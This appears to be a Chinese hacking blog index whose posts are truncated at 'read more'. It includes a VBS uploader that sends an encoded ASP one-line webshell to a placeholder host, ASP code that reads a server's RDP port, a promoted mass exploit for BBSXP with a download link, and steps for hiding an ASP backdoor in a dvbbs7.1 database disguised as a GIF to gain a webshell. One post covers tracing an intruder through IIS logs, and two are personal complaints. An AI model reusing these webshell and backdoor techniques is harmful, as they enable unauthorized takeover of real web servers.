一句话木马用upfile.vbs

来自:情感网络联盟

with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),”\”,”%5C”):ffn=replace(ffn,”:”,”%3A”):ffn=replace(ffn,”~”,”%7E”)
url= “http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22″&ffn&”%22%2C2%0D%0Aend+with%0D%0AResponse.end”
fn=.arguments(0)
阅读全文 »

Tags: ,

利用IIS日志追查网站入侵者

作者:HaK_BaN[B.C.T]   http://www.cnbct.org

以前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,就一定是服务器的安全问题了,以前整天拿着旁注去黑站,这下子好玩了,竟然被别人拿去黑自己的网站了。所以就硬着头皮去找网管问个究竟,怎么知道网管还说我自己的问题,要我自己去找气死我啊。
那只好做一回网管了,如果你是网管你会如何去追查问题的来源了?程序问题就去查看“事件查看器”,如果是IIS问题当然是查看IIS日志了!系统文件夹的system32低下的logfile有所有的IIS日志,用来记录服务器所有访问记录。因为是虚拟主机的用户,所以每个用户都配置独立的IIS日志目录,从里面的日志文件就可以发现入侵者入侵BBS的资料了,所以下载了有关时间段的所有日志下来进行分析,发现了很多我自己都不知道资料!哈哈哈,这下子就知道入侵者是怎么入侵我的BBS了。
阅读全文 »

Tags: ,

查看终端端口的asp代码

作者:kevin1986 来自:邪恶八进制 中国

sub get_terminal_port()
terminal_port_path=”HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\”
terminal_port_key=”PortNumber”
termport=wsh.regread(terminal_port_path&terminal_port_key)
if termport=”” or err.number<>0 then
response.write “无法得到终端服务端口。请检查权限是否已经受到限制。<br>”
else
response.write “当前终端服务端口: “&termport&”<br>”
end if
end sub

Tags: ,

BBSXP SQL版 EXP 通杀版免费公布,几乎所有的通杀版本 for mssql

bbsxp漏洞
by 臭要饭的!

漏洞于去年的一个下雨天,发现的.请大家还是不要使用本程序破坏国内主机,后果与作者无关.

本程序只对SQL版本有效,漏洞原理实用于ACCESS和SQL数据库。但是这里我们是要更改上传设置。
所以不讨论ACCESS数据库,也不想去跑什么MD5密码.一句话,该放弃的还是要放弃.做人不要太绝了.

[程序+动画下载]
http://www.hacker888.com/tools/BBSXPshell.rar

Tags: , ,

dvbbs7.1 照样从后台得到webshell

文章作者:喜欢忧伤
信息来源:邪恶八进制安全小组

背景:
dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了

解决办法:
我把asp木马插入到数据库里,然后恢复。这样肯定检查肯定可以通过的。

具体过程:
前提:
(偶以默认的安装情况为准,具体情况的把握靠自己了.)
你得到论坛dvbbs7.1后台。

1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门]
同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了
===补充下:关键是因为这个图片是access数据库才有用[详细解释见最后]===
阅读全文 »

Tags: , ,

今天真是烂…

我XP的系统,刚才想装个IIS,但是手里又没系统盘,我的系统盘是个GHOST的..
又懒得往街上跑去买,就想去网上找个下载回来用..

不错,找到是找到了
http://www.dzgd.com/download/download/iis5.1.rar
http://fj01.now.net.cn:7751/www.webjx.net/software/200504091iis51.rar

这两个都可以下载,但是到了msmsgs.exe这个文件就卡到那了。没有这个文件 .
郁闷死了。.. :sad:

数据丢了

前段时间把BLOG做好了,然后放到朋友的服务器上了,没想到前几天朋友的服务器被D了…停止之后朋友就先把我的空间停到了,等过几天再开,我一想,干脆换服务器好了.没想到换过来之后,,数据库转不过来了,换成原来的数据,BLOG就没办法正常显示了 ,原来的文章也都丢了

真郁闷,现在用的这个版本比原来那个版本新,可是我明明用他的升级文件把数据也升过级了啊,可就是没办法正常显示,NND..我不用了还不行吗? :shock: :razz: :razz: :oops: :mad: :cry:

Tags: